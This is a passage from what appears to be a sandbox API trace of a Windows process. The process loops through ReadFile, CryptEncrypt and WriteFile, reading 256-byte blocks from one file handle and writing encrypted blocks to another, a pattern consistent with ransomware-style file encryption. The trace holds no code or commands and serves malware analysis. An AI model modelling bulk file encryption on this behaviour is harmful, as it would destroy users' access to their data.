pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.492] GetLastError () returned 0x0 [0204.492] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.492] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.492] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.492] GetLastError () returned 0x0 [0204.492] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.492] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.492] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.492] GetLastError () returned 0x0 [0204.492] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.492] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.493] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.493] GetLastError () returned 0x0 [0204.493] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.493] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.493] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.493] GetLastError () returned 0x0 [0204.493] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.493] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.493] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.493] GetLastError () returned 0x0 [0204.493] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.493] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.493] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.493] GetLastError () returned 0x0 [0204.493] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.493] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.493] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.493] GetLastError () returned 0x0 [0204.493] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.493] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.493] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.494] GetLastError () returned 0x0 [0204.494] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.494] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.494] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.494] GetLastError () returned 0x0 [0204.494] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.494] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.494] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.494] GetLastError () returned 0x0 [0204.494] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.494] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.494] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.494] GetLastError () returned 0x0 [0204.494] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.494] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.494] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.494] GetLastError () returned 0x0 [0204.494] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.494] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.495] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.495] GetLastError () returned 0x0 [0204.495] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.495] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.495] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.495] GetLastError () returned 0x0 [0204.495] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.495] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.495] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.495] GetLastError () returned 0x0 [0204.495] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.495] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.495] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.495] GetLastError () returned 0x0 [0204.495] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.495] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.495] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.495] GetLastError () returned 0x0 [0204.495] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.495] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.495] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.495] GetLastError () returned 0x0 [0204.495] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.496] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.496] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.496] GetLastError () returned 0x0 [0204.496] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.496] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.496] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.496] GetLastError () returned 0x0 [0204.496] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.496] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.496] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.496] GetLastError () returned 0x0 [0204.496] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.496] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.496] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.496] GetLastError () returned 0x0 [0204.496] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.496] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.496] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.496] GetLastError () returned 0x0 [0204.496] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.496] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.497] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.497] GetLastError () returned 0x0 [0204.497] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.497] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.497] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.497] GetLastError () returned 0x0 [0204.497] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.497] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.497] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.497] GetLastError () returned 0x0 [0204.497] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.497] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.497] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.497] GetLastError () returned 0x0 [0204.497] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.497] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.497] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.497] GetLastError () returned 0x0 [0204.497] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.498] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.498] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.498] GetLastError () returned 0x0 [0204.498] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.498] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.498] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.498] GetLastError () returned 0x0 [0204.498] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.498] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.498] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.498] GetLastError () returned 0x0 [0204.498] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.498] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.498] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.498] GetLastError () returned 0x0 [0204.498] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, 